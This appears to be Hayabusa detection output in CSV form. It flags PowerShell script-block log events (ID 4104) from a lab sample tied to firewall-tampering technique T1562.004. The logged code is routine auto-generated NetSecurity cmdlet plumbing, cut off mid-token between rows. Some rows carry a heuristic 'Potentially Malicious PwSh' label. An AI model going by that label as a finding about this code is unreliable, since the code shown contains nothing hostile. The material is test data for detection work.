${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.444 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 